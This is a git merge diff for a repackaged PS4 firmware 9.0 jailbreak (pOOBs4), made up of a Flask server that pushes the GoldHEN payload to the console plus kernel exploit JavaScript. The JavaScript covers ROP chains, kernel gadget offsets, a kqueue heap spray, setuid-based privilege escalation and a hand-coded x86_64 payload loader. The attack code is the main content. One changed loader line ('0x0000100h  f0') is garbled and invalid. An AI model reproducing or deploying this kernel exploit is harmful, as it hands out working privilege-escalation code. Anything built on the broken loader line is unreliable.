Merge pull request #8 from mc-17/update/all

Update/all

README.md

@@ -5,9 +5,6 @@ pOOBs4 PS4 exploit for v9.0 + automatic gold hen
 
 This is just a repacked psOOBs4, as a flask package with the addition of automatic sending of GoldHEN. Some other small changes:
 
-- Some magic numbers have been renamed (never looked at a PS4 bug before, and wanted to know wtf was going on)
-- Some additional logging via HTTP requests (not massively useful as can't do a lot in critical section, but useful for kicking off goldenhen send)
-
 All credit to the team behind pOOBs4
 
 ## Setup

app.py

@@ -26,7 +26,7 @@ def log(msg):
     if "done" in msg or "already" in msg:
         # success message, send HEN
         print(f"Sending golden hen to {request.remote_addr}")
-        send(request.remote_addr, 9020, "payload/goldhen_2.0b_900.bin")
+        send(request.remote_addr, 9020, "payload/goldhen_2.0b2_900.bin")
 
     print(msg)
     return "OK"

sender.py

@@ -1,13 +1,13 @@
 import socket
 
+
 def send(ip, port, file):
-    clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, proto=0)
-    clientSocket.settimeout(3000)
-    clientSocket.connect((ip, port))
+    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, proto=0)
+    client_socket.settimeout(3000)
+    client_socket.connect((ip, port))
 
     try:
         with open(file, "rb") as fp:
-            clientSocket.sendfile(fp)
-            clientSocket.close()
+            client_socket.sendfile(fp)
     finally:
-        clientSocket.close()
+        client_socket.close()

static/9.0.0/kexploit.js

@@ -86,6 +86,9 @@ var ipmi_gadgetmap = {
 
 function userland() {
 
+    //RW -> ROP method is strongly based off of:
+    //https://github.com/Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit
+
     p.launch_chain = launch_chain;
     p.malloc = malloc;
     p.malloc32 = malloc32;
@@ -256,18 +259,21 @@ function userland() {
 
 function run_hax() {
     userland();
-    if (chain.syscall(SYSCALL_SETUID, 0).low != 0x0) {
+    if (chain.syscall(23, 0).low != 0x0) {
         kernel();
         //this wk exploit is pretty stable we can probably afford to kill webkit before payload loader but should we?.
-    }
-    else
-    {
-        logMessage("already patched setuid!");
+        //p.write8(0x0, 0x0); //write to 0x0 -> kill browser.
     }
 
+    //tries to map at 0x926200000 because there's still idk how many payloads that have it hardcoded like that. No MAP_FIXED for them though...
     var payload_buffer = chain.syscall(SYSCALL_MMAP, new int64(0x26200000, 0x9), 0x300000, 7, 0x41000, -1, 0);
     var payload_loader = p.malloc32(0x1000);
 
+    //NOTE: You can replace this with a payload instead of the loader.
+    //You would need to create an array view of payload_buffer to do that. (var payload_writer = p.array_from_address(payload_buffer);)
+    //And other ways, ....
+
+    //This is  x86_64 asm, you can disassemble it* if you want to know what the payload loader does under the hood. (* will need to account for endianness)
     var loader_writer = payload_loader.backing;
     loader_writer[0] = 0x56415741;
     loader_writer[1] = 0x83485541;
@@ -299,7 +305,7 @@ function run_hax() {
     loader_writer[27] = 0x01499848;
     loader_writer[28] = 0xF78944C5;
     loader_writer[29] = 0xBAEE894C;
-    loader_writer[30] = 0x00001000;
+    loader_writer[30] = 0x0000100h  f0;
     loader_writer[31] = 0x000025E8;
     loader_writer[32] = 0x7FC08500;
     loader_writer[33] = 0xFF8944E7;
@@ -342,7 +348,6 @@ function kernel() {
     kchain_setup();
     object_setup();
     trigger_spray();
-    logMessage("done!");
 }
 
 var handle;
@@ -374,6 +379,7 @@ function load_prx(name) {
     return tlsinit;
 }
 
+//Obtain extra gadgets through module loading
 function extra_gadgets() {
     handle = p.malloc(0x150);
     var randomized_path_ptr = handle.add32(0x4);
@@ -401,6 +407,7 @@ function extra_gadgets() {
     }
 }
 
+//Build the kernel rop chain, this is what the kernel will be executing when the fake obj pivots the stack.
 function kchain_setup() {
     const KERNEL_setidt = 0x312c40;
     const KERNEL_setcr0 = 0x1FB949;
@@ -578,12 +585,10 @@ function object_setup() {
 }
 
 var trigger_spray = function () {
-    //Make socket <= 0xFF | -> alloc 0x800
-
 
     var NUM_KQUEUES = 0x1B0;
     var kqueue_ptr = p.malloc(NUM_KQUEUES * 0x4);
-    //Make Kqueues
+    //Make kqueues
     {
         for (var i = 0; i < NUM_KQUEUES; i++) {
             chain.fcall(window.syscalls[SYSCALL_kqueue]);
@@ -592,10 +597,8 @@ var trigger_spray = function () {
     }
     chain.run();
     var kqueues = p.array_from_address(kqueue_ptr, NUM_KQUEUES);
-    let AF_INET = 2;
-    let SOCK_STREAM = 1;
-    let PROTO_IP    = 0;
-    var that_one_socket = chain.syscall(SYSCALL_SOCKET, AF_INET, SOCK_STREAM, PROTO_IP);
+
+    var that_one_socket = chain.syscall(SYSCALL_SOCKET, 2, 1, 0);
     if (that_one_socket.low < 0x100 || that_one_socket.low >= 0x200) {
         alert("invalid socket");
         while (1);
@@ -625,9 +628,7 @@ var trigger_spray = function () {
     chain.run();
 
     //Trigger OOB
-    logMessage("ready for kexploit USB");
     alert("Insert USB now. do not close the dialog until notification pops, remove usb after closing it.");
-    logMessage("running kexploit");
     //Trigger corrupt knote
     {
         for (var i = 1; i < NUM_KQUEUES; i += 2) {
@@ -636,10 +637,12 @@ var trigger_spray = function () {
     }
     chain.run();
     if (chain.syscall(SYSCALL_SETUID, 0).low == 0) {
-        logMessage("kernel exploit success!");
-    }
-    else {
-        logMessage("exploit failed (kernel heap might be fucked if you *did* insert the USB");
-        p.write8(0, 0);
-    }
+        logMessage("done");
+        return;
+    }
+    alert(`Failed to trigger the exploit,  This happened because you plugged it in too late/early or not at all.
+    if you did plug it in then the kernel heap is slightly corrupted, this might cause panics later on.
+    closing this alert will crash the browser for you.`);
+    p.write8(0, 0);
+    return;
 }